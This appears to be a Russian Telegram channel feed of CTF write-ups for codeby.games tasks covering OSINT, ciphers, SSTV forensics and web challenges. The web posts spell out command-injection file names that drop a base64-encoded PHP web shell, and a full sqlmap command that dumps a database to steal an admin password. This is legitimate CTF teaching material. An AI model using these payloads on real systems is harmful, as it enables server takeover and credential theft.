Друзья! Кто решил ETL файлы? Не стесняемся, присылайте нам ваши решения! Главное подход к задаче, потому каждый из них уникален!
Для публикации райтапов пишите: @freenameruuuu и @coffeedipso
Для публикации райтапов пишите: @freenameruuuu и @coffeedipso
❤2
#Криптография Холмы от @andreika47
Дана матрица с номерами и строка с алфавитом
-------------------------
|76 |101|115|116|101|114|
-------------------------
|32 |83 |97 |110|100|101|
-------------------------
|114|115|32 |115|104|111|
-------------------------
|117|108|100|32 |104|101|
-------------------------
|108|112|32 |121|111|117|
-------------------------
|32 |58 |41 |41 |41 |42 |
-------------------------
KLZCOUKTVOUWUKDOBGZVJIIIRGVHXCRQUCNOX_IBBL
Пробуем декодировать матрицу в ascii. Получаем имя и фамилю криптографа, который знаменит шифром Хилла.
Гуглим , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица.
Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания.
Подобрав правильный алфавит (нам нужны буквы латиницы и символ _) получаем ответ!
🚩 https://codeby.games
#codebygames
Дана матрица с номерами и строка с алфавитом
-------------------------
|76 |101|115|116|101|114|
-------------------------
|32 |83 |97 |110|100|101|
-------------------------
|114|115|32 |115|104|111|
-------------------------
|117|108|100|32 |104|101|
-------------------------
|108|112|32 |121|111|117|
-------------------------
|32 |58 |41 |41 |41 |42 |
-------------------------
KLZCOUKTVOUWUKDOBGZVJIIIRGVHXCRQUCNOX_IBBL
Пробуем декодировать матрицу в ascii. Получаем имя и фамилю криптографа, который знаменит шифром Хилла.
Гуглим , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица.
Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания.
Подобрав правильный алфавит (нам нужны буквы латиницы и символ _) получаем ответ!
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
www.dcode.fr
Hill Cipher
Tool to decrypt/encrypt with Hill cipher, a ciphering system similar to affine cipher but using a coefficient matrix instead of 2 affine coefficients (gradient).
🔥3💊1
#WEB таск "Печенье" от @ErikPupOn:
Реализация через Python!
🚩 https://codeby.games
#codebygames
Реализация через Python!
import requests
url = "http://62.173.140.174:46002/"
session = requests.Session()
cookies_data = {
"cookies": "[Sugar cookies, Oatmeal cookies, Crackers cookies]",
"amount": '[1, 5, 2]'
}
response = session.get(url, cookies=cookies_data)
print(response.text)
session.close()
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤬12🌚3
#OSINT от @scars_on_the_hands
По вложенной фотографии с помощью Google Lens можно найти статью, в которой упоминается много раз страна Грузия.
По поиску в интернете 1983 Грузия ужасная катастрофа выдается случай с захватом самолета.
Воспользуемся помощью Chat GPT и попросим его выдать всех знаменитостей, вовлеченных в данный инцидент.
🚩 https://codeby.games
#codebygames
В 1983 году в одной из стран произошел ужасный инцидент. Говорят, что известный актер был замешан в этом инциденте, но точную дату его рождения нам и предстоит узнать.
По вложенной фотографии с помощью Google Lens можно найти статью, в которой упоминается много раз страна Грузия.
По поиску в интернете 1983 Грузия ужасная катастрофа выдается случай с захватом самолета.
Воспользуемся помощью Chat GPT и попросим его выдать всех знаменитостей, вовлеченных в данный инцидент.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
#OSINT Перелёты от @Zer0_Tw0_02
~ По заданию говориться о каком-то произошедшем инциденте в 1983г и участвовавшем в нём актёре, дату рождения которого нам и предстоит узнать.
С помощью любой поисковой системы, либо Нейро от Яндекса ищем информацию по запросу "Мировые инциденты 1983г", и открыв Список террористических актов 1983 года можем найти Попытку угона Ту-134 в ноябре 1983 года, среди которых в числе причастных имеется нужное нам лицо. Остаётся лишь дело за малым - найти его дату рождения.
🚩 https://codeby.games
#codebygames
~ По заданию говориться о каком-то произошедшем инциденте в 1983г и участвовавшем в нём актёре, дату рождения которого нам и предстоит узнать.
С помощью любой поисковой системы, либо Нейро от Яндекса ищем информацию по запросу "Мировые инциденты 1983г", и открыв Список террористических актов 1983 года можем найти Попытку угона Ту-134 в ноябре 1983 года, среди которых в числе причастных имеется нужное нам лицо. Остаётся лишь дело за малым - найти его дату рождения.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1
#OSINT Анимешник от @Zer0_Tw0_02
~ По заданию говориться о друге-анимешнике, который потерялся где-то на пару часов в аэропорту Токио 17 января 2024 на самолёте с бортовым номером серии XX-XXX
Первым делом ищем где взять архивные вылеты/прилеты аэропортов Токио и натыкаемся на сайт, на котором выбираем TOKYO NARITA INTERNATIONAL AIRPORT, после чего находим Список стран и их префиксов регистрации воздушных судов и перебираем по дате каждый подходящий рейс, чтобы изучить бортовые номера самолётов.
Либо выключаем мозг и читаем прям через слово, и сложив пазл воедино "Самолёт+Аниме" логически додумываем либо это Аниме-рейс, либо скин. Используя любой поисковик находим самолёты серии Pokemon Jet и там уже лежит заветный борт.
🚩 https://codeby.games
#codebygames
~ По заданию говориться о друге-анимешнике, который потерялся где-то на пару часов в аэропорту Токио 17 января 2024 на самолёте с бортовым номером серии XX-XXX
Первым делом ищем где взять архивные вылеты/прилеты аэропортов Токио и натыкаемся на сайт, на котором выбираем TOKYO NARITA INTERNATIONAL AIRPORT, после чего находим Список стран и их префиксов регистрации воздушных судов и перебираем по дате каждый подходящий рейс, чтобы изучить бортовые номера самолётов.
Либо выключаем мозг и читаем прям через слово, и сложив пазл воедино "Самолёт+Аниме" логически додумываем либо это Аниме-рейс, либо скин. Используя любой поисковик находим самолёты серии Pokemon Jet и там уже лежит заветный борт.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤1
Рекомендательный контент!
Фильм "Хакеры"
Команда университетских компьютерных гениев вступает в войну с сетевым злодеем
История про хакеров, которые случайно взламывают защиту корпорации «Эллингсон» и подключаются к схеме хищения средств, искусно замаскированной под компьютерный вирус.
https://www.afisha.ru/movie/hakery-165867/
Фильм "Хакеры"
Команда университетских компьютерных гениев вступает в войну с сетевым злодеем
История про хакеров, которые случайно взламывают защиту корпорации «Эллингсон» и подключаются к схеме хищения средств, искусно замаскированной под компьютерный вирус.
https://www.afisha.ru/movie/hakery-165867/
Афиша
Фильм Хакеры (США, 1995) – Афиша-Кино
Фильм Хакеры (Hackers, США, 1995) – актеры, трейлеры, отзывы пользователей и рецензии критиков, похожие фильмы и кадры из него
👍7🔥2💔2
#WEB "Архиватор" от @IFed00
Открываем задание, видим одностраничник (
После изучения понимаем, что единственная ручка за которую можно дёргать - это имя посылаемого файла. Мой мощный тиммейт обнаружил, что имя используется в bash'e подменив его (с помощью burp proxi) на
Соответственно пытаемся передать для архивации какой-то более интересный путь ("/" если готовы качать потенциальные гигабайты в виде архивированной системы) и... архив не создаётся( Видимо внутренняя ошибка, о которой сайт нам не сообщает. Собственно решение на поверхности: а потом и Warning: potential >10MB .zip
Таким образом получаем доступ к исходному коду
Отсюда решения могут быть разными, вот моё:
загрузим простенький бэкдор на php, который будет исполнять команду переданную через GET-запрос c параметром
Чтобы не возиться с экранированием символов закодируем его в base64 и отправим на архивацию файл со следующим "именем":
Теперь в директории с правами выполнения у нас есть свой человечек...
Немного
🚩 https://codeby.games
#codebygames
Открываем задание, видим одностраничник (
index.php) который позволяет загружать файлы и выдаёт zip архив с ними. Имя архива рандомизируется, а сами архивы лежат в /upload/.После изучения понимаем, что единственная ручка за которую можно дёргать - это имя посылаемого файла. Мой мощный тиммейт обнаружил, что имя используется в bash'e подменив его (с помощью burp proxi) на
; sleep 10; и получив соответствующую задержку.Соответственно пытаемся передать для архивации какой-то более интересный путь ("/" если готовы качать потенциальные гигабайты в виде архивированной системы) и... архив не создаётся( Видимо внутренняя ошибка, о которой сайт нам не сообщает. Собственно решение на поверхности:
$(pwd)$(cd .. && pwd)Таким образом получаем доступ к исходному коду
index.php, который подтверждает все догадки: имя файла используется как часть команды bash. Однако перед этим сервер пытается переместить наш файл из временного хранилища со случайными именем в /uploads/*filename* и если имя содержит запрещённые символы (для имён файлов) выполнение прерывается. Самый интересный из запрещённых символов это конечно "/" который как раз позволил бы нам "походить" по системы и поискать флаг.Отсюда решения могут быть разными, вот моё:
загрузим простенький бэкдор на php, который будет исполнять команду переданную через GET-запрос c параметром
cmd в bash и выводить ответ:<?php echo shell_exec($_GET('cmd') ?>Чтобы не возиться с экранированием символов закодируем его в base64 и отправим на архивацию файл со следующим "именем":
$(cd .. && echo 'base64blob' | base64 --decode > backdoor.php)Теперь в директории с правами выполнения у нас есть свой человечек...
Немного
/backdoor.php?cmd=ls и в /var/www/ обнаруживаем flag.txt! Дальше cat /var/www/flag.txt и наконец rm backdoor.php#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👏2💊2🤯1
#OSINT Аниме-друг от @coffeedipso, @maoirt:
Находим сайт, который предоставляют информацию о самолетах, например -> (https://www.airliners.net/)
(The Best Airplane Information, Aviation Photos and Aviation News! 3,590,595 photos online!), вбиваем дату и место, там будет 2 страницы фотографий самолетов.
Ищем в стикерах аниме (почти последний, 2 страница), смотрим на номер!
🚩 https://codeby.games
#codebygames
Находим сайт, который предоставляют информацию о самолетах, например -> (https://www.airliners.net/)
(The Best Airplane Information, Aviation Photos and Aviation News! 3,590,595 photos online!), вбиваем дату и место, там будет 2 страницы фотографий самолетов.
Ищем в стикерах аниме (почти последний, 2 страница), смотрим на номер!
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍1
Рекомендательный контент!
Вторжение. Краткая история русских хакеров
Летом 2016 года неизвестные выложили в интернет переписку высших чинов Демократической партии США — и российские хакеры, предположительно работающие на Кремль, моментально превратились в один из главных сюжетов мировой политики. Спецкор «Медузы», обладатель премии GQ в номинации «Журналист года» и четырех премий «Редколлегия» Даниил Туровский к тому времени писал об этих людях уже несколько лет: одни из них публиковали архивы почты российских чиновников, другие взламывали госсайты сопредельных стран по просьбе спецслужб, третьи просто зарабатывали миллионы, воруя их по всему миру.
«Вторжение» — самая полная история российских хакеров: от советских матшкол и постсоветской нищеты к мировой кибервойне и транснациональным преступным группировкам. Книга описывает новый тип власти — но, как показывает Туровский, люди, которые обладают этой властью, сталкиваются все с теми же моральными дилеммами, выбирая между тюрьмой и сумой, чувством и долгом, добром и злом.
Читать:https://bookmate.ru/books/zkRpzayD
Слушать: https://bookmate.ru/audiobooks/hlFogJtL
Вторжение. Краткая история русских хакеров
Летом 2016 года неизвестные выложили в интернет переписку высших чинов Демократической партии США — и российские хакеры, предположительно работающие на Кремль, моментально превратились в один из главных сюжетов мировой политики. Спецкор «Медузы», обладатель премии GQ в номинации «Журналист года» и четырех премий «Редколлегия» Даниил Туровский к тому времени писал об этих людях уже несколько лет: одни из них публиковали архивы почты российских чиновников, другие взламывали госсайты сопредельных стран по просьбе спецслужб, третьи просто зарабатывали миллионы, воруя их по всему миру.
«Вторжение» — самая полная история российских хакеров: от советских матшкол и постсоветской нищеты к мировой кибервойне и транснациональным преступным группировкам. Книга описывает новый тип власти — но, как показывает Туровский, люди, которые обладают этой властью, сталкиваются все с теми же моральными дилеммами, выбирая между тюрьмой и сумой, чувством и долгом, добром и злом.
Читать:https://bookmate.ru/books/zkRpzayD
Слушать: https://bookmate.ru/audiobooks/hlFogJtL
bookmate.ru
Читать «Вторжение. Краткая история русских хакеров». Даниил Туровский в Букмейте
«Вторжение. Краткая история русских хакеров» Даниил Туровский читать полную версию книги на сайте или в приложении электронной онлайн библиотеки Букмейт.
🔥5🖕3🤨2
#WEB Снитч от @freenameruuuu
Очень смешной таск. Первым делом пытался что-то сделать с JS, котроый отвечал за перемещение кнопки с целью, но потом глянув чуть ниже увидел в диве флаг. Такие дела)))
🚩 https://codeby.games
#codebygames
Очень смешной таск. Первым делом пытался что-то сделать с JS, котроый отвечал за перемещение кнопки с целью, но потом глянув чуть ниже увидел в диве флаг. Такие дела)))
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
💊5❤1😁1
#WEB Игровой автомат от @w0ltage
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
Зная это, дружим sqlmap с генерацией хэша через
*переменная
Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
🚩 https://codeby.games
#codebygames
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLiВ POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
result=944&hash=6bed8834f12ba1043159b2cd5f846708
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
md5(sha256(sha1(sha256(sha1(result)))))
Зная это, дружим sqlmap с генерацией хэша через
--eval и дампим БДsqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all*переменная
result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🖕3👍2
#OSINT Код Да Винчи от @Zer0_Tw0_02
~В описании говорится о Кодексе или собрании от ДаВинчи и связи с Атлантом
Открыв тот же Вики ДаВинчи находим все рукописи, после отбросив все лишние элементы понимаем, что это один из кодексов "Атлантический кодекс". Забив в поисковую строку "Кодекс Атланта" Яндекс в первых строках выдаёт сайт с отсканированной копией данного кодекса. Остаётся только ввести флаг с использованием ДОМЕНА 3-го УРОВНЯ.
🚩 https://codeby.games
#codebygames
~В описании говорится о Кодексе или собрании от ДаВинчи и связи с Атлантом
Открыв тот же Вики ДаВинчи находим все рукописи, после отбросив все лишние элементы понимаем, что это один из кодексов "Атлантический кодекс". Забив в поисковую строку "Кодекс Атланта" Яндекс в первых строках выдаёт сайт с отсканированной копией данного кодекса. Остаётся только ввести флаг с использованием ДОМЕНА 3-го УРОВНЯ.
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Друзья! Всем доброе утро.
Выкладываем ВСЕ по #WEB от @ishanyam
Ссылка на райтапы, которые прекрасно организованы в статьи
https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam
PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из раздела web. Михаил собирается позже добавить по последнему Колизею . Как только они там появятся мы сообщим
🚩 https://codeby.games
#codebygames
Выкладываем ВСЕ по #WEB от @ishanyam
Ссылка на райтапы, которые прекрасно организованы в статьи
https://md.ishanyam.site/qnls-VBSQ3SwgtzrjPyGQA @ishanyam
PS. Немного ввели в заблуждение. Это таски впринципе с codeby.games из раздела web. Михаил собирается позже добавить по последнему Колизею . Как только они там появятся мы сообщим
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩8🤔3🔥1
Forwarded from Artyom
Игровой автомат
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
В POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
Зная это, дружим sqlmap с генерацией хэша через
*переменная
Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
Зарегистрировавшись и покрутив однорукого бандита, видим как сервер отдаёт имя другого игрока.
Предположительно, на бэкенде SQL запрос к БД вида
SELECT * FROM players WHERE result = 111 LIMIT 1, т.e. таск вероятно на SQLiВ POST запросах видим как результат передаётся с каким-то хэшем, без которого сервер не принимает результат
result=944&hash=6bed8834f12ba1043159b2cd5f846708
Хэш явно генерится на клиенте, поэтому смотрим .js файлы и находим, как хэш генерится по формуле
md5(sha256(sha1(sha256(sha1(result)))))
Зная это, дружим sqlmap с генерацией хэша через
--eval и дампим БДsqlmap --eval "import hashlib;hash=hashlib.md5(hashlib.sha256(hashlib.sha1(hashlib.sha256(hashlib.sha1(result.encode('utf-8')).digest()).digest()).digest()).digest()).hexdigest()" -r request.txt --level 3 --dump-all*переменная
result в середине и hash в начале, подразумевает "скульмап, хэшируй значение, которое будешь подставлять в параметр result и вставляй полученное в параметр hash"Из БД вытаскиваем пароль от админа, логинимся и получаем флаг
👍5😐2❤1
#Форензика Гул земли 2 от @synberg
Хочу предложить решение таски из форензики "Гул земли 2"
В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36
Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом
🚩 https://codeby.games
#codebygames
Хочу предложить решение таски из форензики "Гул земли 2"
В wav файле закодировано изображение с использованием SSTV. Если конкретнее, то использовался формат Robot36
Пользовался приложением под андроид "Robot36 - SSTV Image Decoder". Есть аналогичные утилиты под Windows/Linux. После декодирования сигнала получаем изображение с флагом
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
👏5❤1
#Криптография от @andreika47
Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.
Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.
Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова
🚩 https://codeby.games
#codebygames
Легкая крипта 1:
Дана таблица с номерами. Пробуем декодировать их в ascii. Получаем имя и фамилия криптографа, который знаменит шифром Хилла. Гугли , где можно зашифровать/расшифровать шифр Хилла онлайн, попадаем на https://www.dcode.fr/hill-cipher.
Почитав про шифр понимаем, что он симметричный, а ключом шифрования является матрица. Там же на dCode пробуем использовать в качестве ключа таблицу с числами из задания. Подобрав правильный алфавит (на нужны буквы латиницы и символ _) получаем ответ.
Легкая крипта 2:
Точки и тире напоминают азбуку Морзе. Гуглим декодирование морзянки, выбираем любой сайт (я выбрал https://www.dcode.fr/morse-code). Пробуем декодировать шифртекст из задания, не заменя на пробел слова яблоко, банан и тд.
Средняя крипта:
Смотрим на код шифратора. Там берется алфавит латиницы в нижнем регистре, перемешивается и получается алфавит шифртекста. Получается шифр подстановки. Мы знаем, что в начале открытого текста codeby. Из этого мы можем получить часть соответствия между алфавитом открытого текста и алфавитом шифртекста. Далее нужно подобрать остальные символы флага, чтобы они были похожи на английские слова
#codebygames
Please open Telegram to view this post
VIEW IN TELEGRAM
www.dcode.fr
Hill Cipher
Tool to decrypt/encrypt with Hill cipher, a ciphering system similar to affine cipher but using a coefficient matrix instead of 2 affine coefficients (gradient).
👍8❤1